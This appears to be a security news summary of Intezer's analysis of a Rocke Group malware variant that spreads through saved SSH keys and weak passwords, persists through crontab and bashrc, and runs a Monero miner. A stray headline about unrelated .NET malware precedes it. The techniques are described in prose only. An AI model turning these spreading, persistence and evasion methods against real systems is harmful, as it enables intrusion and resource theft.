Morphisec cybersecurity experts: The malware, written in .NET, is delivered through MSI installer and thwarts online AV scanners.
Intezer: Rocke Group is using a new malware variant to infect network machines using saved SSH keys and weak passwords. Once the victim is infected, a Monero cryptominer is executed
Rocke Group is using a new malware variant to infect network machines using saved SSH keys and weak passwords. It has been discovered by Intezer cybersecurity experts. It also exploits vulnerabilities in platforms and services such as Jenkins, Redis and ActiveMQ. Once the victim is infected, a Monero cryptominer is executed. The China-linked APT initially delivers the malicious code to the victim’s server packed with a modified UPX, which can make it harder for some EDR products to detect the malware. This threat contains a number of modules that are stored in a compressed form inside the code, and during the execution the payloads are extracted and executed. Furthermore, Rocke Group uses a new script that downloads malware from a hosting server and executes it. This then uses public SSH keys, saved the “known_hosts” file on the victim’s Linux machine, to infect other machines on the network.
The behaviour of the malicious code
According the cybersecurity experts, the cybercrime actor’s malware archives persistence using a scheduled task in crontab and bashrc files. Next, the malicious code attempts to spread in the network by brute forcing SSH, Redis and Jenkins with weak passwords. Then, it exploits vulnerabilities. To hide the activity of the malware, it implements an evasion technique that uses library hijacking. Moreover, before the miner is executed, the dropper kills any other process that uses more than 30% of the cloud server’s CPU. In this way the Rocke Group malicious code will have all of the CPU for itself.